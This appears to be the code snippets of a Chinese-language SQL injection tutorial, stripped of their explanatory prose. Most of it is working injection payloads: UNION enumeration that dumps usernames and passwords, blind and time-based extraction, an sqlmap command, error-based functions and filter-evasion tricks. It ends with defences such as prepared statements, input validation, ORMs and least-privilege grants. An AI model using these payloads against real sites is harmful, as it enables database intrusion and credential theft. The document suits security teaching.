1
用户输入 --> 应用程序 --> SQL查询 --> 数据库
2
    |
3
    └── 恶意SQL片段 --> 拼接到查询中 --> 执行恶意操作

1
-- 1. 判断字段数
2
?id=1 ORDER BY 1-- -
3
?id=1 ORDER BY 2-- -
4
?id=1 ORDER BY 3-- -  # 报错说明字段数为2
5

6
-- 2. 判断回显位置
7
?id=-1 UNION SELECT 1,2-- -
8

9
-- 3. 获取数据库信息
10
?id=-1 UNION SELECT 1,database()-- -
11
?id=-1 UNION SELECT 1,version()-- -
12

13
-- 4. 获取所有数据库名
14
?id=-1 UNION SELECT 1,group_concat(schema_name) FROM information_schema.schemata-- -
15

16
-- 5. 获取表名
17
?id=-1 UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema='target_db'-- -
18

19
-- 6. 获取列名
20
?id=-1 UNION SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_name='users'-- -
21

22
-- 7. 获取数据
23
?id=-1 UNION SELECT 1,group_concat(username,0x3a,password) FROM users-- -

1
-- 判断数据库名长度
2
?id=1 AND LENGTH(database())=8-- -
3

4
-- 逐位获取数据库名
5
?id=1 AND ASCII(SUBSTR(database(),1,1))>100-- -
6
?id=1 AND ASCII(SUBSTR(database(),1,1))=116-- -  # 't'
7

8
-- 使用二分法提高效率
9
?id=1 AND ASCII(SUBSTR(database(),1,1))>96-- -   # 真
10
?id=1 AND ASCII(SUBSTR(database(),1,1))>112-- -  # 假
11
?id=1 AND ASCII(SUBSTR(database(),1,1))>104-- -  # 假
12
?id=1 AND ASCII(SUBSTR(database(),1,1))>100-- -  # 真
13
?id=1 AND ASCII(SUBSTR(database(),1,1))=101-- -  # 'e'

1
-- 判断数据库名长度
2
?id=1 AND IF(LENGTH(database())=8,SLEEP(5),0)-- -
3

4
-- 逐位获取数据库名
5
?id=1 AND IF(ASCII(SUBSTR(database(),1,1))=116,SLEEP(5),0)-- -
6

7
-- 使用SQLMap
8
sqlmap -u "http://target.com/?id=1" --technique=T --time-sec=5

1
-- extractvalue()
2
?id=1 AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))-- -
3

4
-- updatexml()
5
?id=1 AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- -
6

7
-- floor()
8
?id=1 AND (SELECT 1 FROM (SELECT COUNT(*),concat((SELECT database()),0x7e,floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -

1
?id=1 UNION SELECT 1,2-- -
2
?id=1 uNiOn SeLeCt 1,2-- -

1
?id=1 UNIUNIONON SELSELECTECT 1,2-- -

1
-- URL编码
2
?id=1 %55%4E%49%4F%4E %53%45%4C%45%43%54 1,2-- -
3

4
-- Hex编码
5
?id=1 UNION SELECT 0x31,0x32-- -
6

7
-- Base64编码
8
?id=1 UNION SELECT FROM_BASE64('MQ=='),FROM_BASE64('Mg==')-- -

1
?id=1 /*!UNION*/ /*!SELECT*/ 1,2-- -
2
?id=1 /**/UNION/**/SELECT/**/1,2-- -

1
-- 使用括号
2
?id=1 UNION(SELECT(1),(2))-- -
3

4
-- 使用注释
5
?id=1/**/UNION/**/SELECT/**/1,2-- -
6

7
-- 使用其他空白符
8
?id=1%0aUNION%0aSELECT%0a1,2-- -

1
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id");
2
$stmt->execute(['id' => $id]);
3
$user = $stmt->fetch();

1
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))

1
String sql = "SELECT * FROM users WHERE id = ?";
2
PreparedStatement pstmt = conn.prepareStatement(sql);
3
pstmt.setInt(1, userId);
4
ResultSet rs = pstmt.executeQuery();

1
def validate_input(value):
2
    # 只允许数字
3
    if not value.isdigit():
4
        raise ValueError("Invalid input")
5
    return int(value)

1
# Django ORM
2
User.objects.filter(id=user_id)
3

4
# SQLAlchemy
5
session.query(User).filter(User.id == user_id)

1
-- 为Web应用创建专用数据库用户
2
CREATE USER 'webapp'@'localhost' IDENTIFIED BY 'password';
3
GRANT SELECT, INSERT, UPDATE ON target_db.* TO 'webapp'@'localhost';
4
-- 不要授予 DROP, DELETE, ALTER 等危险权限